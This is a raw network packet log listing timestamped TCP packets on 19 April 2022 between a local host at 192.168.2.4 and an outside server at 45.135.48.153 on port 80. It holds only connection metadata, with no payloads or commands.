Apr 19, 2022 16:44:42.946244001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946269035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.946281910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946299076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.946490049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946747065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.946804047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.947019100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.947072983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.947237968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.947480917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.947508097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.947529078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.947683096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.947848082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.947958946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948016882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.948040962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948086977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.948143959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948270082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948407888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948461056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.948471069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948519945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.948564053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948645115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.948771000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948815107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.948824883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.948884964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.948968887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949018955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.949057102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949152946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949274063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949328899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.949405909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949453115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.949568033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949609041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949727058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949779034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.949815035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.949858904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.949911118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950045109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950175047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950229883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.950329065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950376034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.950442076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950530052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950644970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950697899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.950726986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950769901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.950846910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.950967073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951060057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951112986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.951205969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951253891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.951316118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951406002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951513052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951539040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.951688051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951770067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951833010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.951888084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.951955080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.952114105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.952353001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.952558041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.952611923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.952822924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.952881098 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.953053951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.953294039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.953347921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.953567028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.953638077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.953710079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.953763008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.953886032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.953963041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.954015970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.954127073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.954180956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.954221010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.954327106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.954418898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.954469919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.954569101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.954654932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.954710960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.954763889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.954833984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.954873085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955007076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955070019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.955108881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955197096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955244064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.955307961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955465078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955569983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955665112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.955676079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955804110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955873013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.955926895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.955974102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.956038952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.956126928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.956247091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.956302881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.956386089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.956485033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.956518888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.956610918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.956711054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.956784010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.956824064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.956927061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.956981897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957062960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957113028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.957175970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957287073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957344055 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.957397938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957529068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957607985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957665920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.957745075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957796097 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.957837105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.957927942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958089113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958143950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.958180904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958228111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.958266973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958388090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958528996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958581924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.958609104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958656073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.958728075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958846092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958942890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.958998919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.959095001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.959141016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.959192991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.959331989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.959433079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.959486961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.959568977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.959630013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.959691048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.959772110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.959819078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.959897041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960016012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960114956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960167885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.960203886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960251093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.960545063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960562944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960578918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960629940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.960676908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960726023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.960814953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960872889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.960997105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961051941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.961148977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961204052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.961271048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961374998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961429119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.961477995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961576939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961642027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.961678982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961817980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961935997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.961992979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.962043047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.962094069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.962131977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.962285042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.962493896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.962555885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.962738037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.962796926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.962949038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.963211060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.963454962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.963526011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.963701010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.963758945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.963924885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.964170933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.964293003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.964350939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.964375019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.964420080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.964468956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.964617014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.964736938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.964795113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.964829922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.964876890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.964926004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965056896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965178013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965231895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.965289116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965336084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.965373039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965531111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965614080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965671062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.965735912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965784073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.965821981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.965981007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.966094017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.966150999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.966191053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.966238022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.966284990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.966439009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.966527939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.966583014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.966656923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.966706991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.966753960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.966897964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.967014074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.967071056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.967108011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.967153072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.967255116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.967298031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.967541933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.144783020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.144840956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.144879103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.144923925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.144963026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.144965887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145020962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.145129919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145170927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145181894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.145359993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145415068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.145462036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145534992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145705938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145768881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.145823002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145879030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.145900965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.145973921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.146106005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.146177053 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.146248102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.146308899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.146377087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.146416903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.146548986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.146611929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.146665096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.146722078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.146846056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.146888971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.147023916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.147082090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.147103071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.147171021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.147264957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.147384882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.147506952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.147561073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.147659063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.147715092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.147780895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.147908926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148088932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148183107 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.148232937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148293972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.148348093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148545980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148587942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148627043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148647070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.148669004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148684978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.148710012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148761988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.148868084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.148926973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149106026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149168968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.149225950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149286985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.149332047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149401903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149501085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149557114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.149622917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149748087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149785995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.149852037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.149909019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.149975061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.150115967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.150207996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.150254965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.150326967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.150379896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.150424004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.150568962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.150609970 CEST	80	49758	45.135.48.153	192.168.2.4
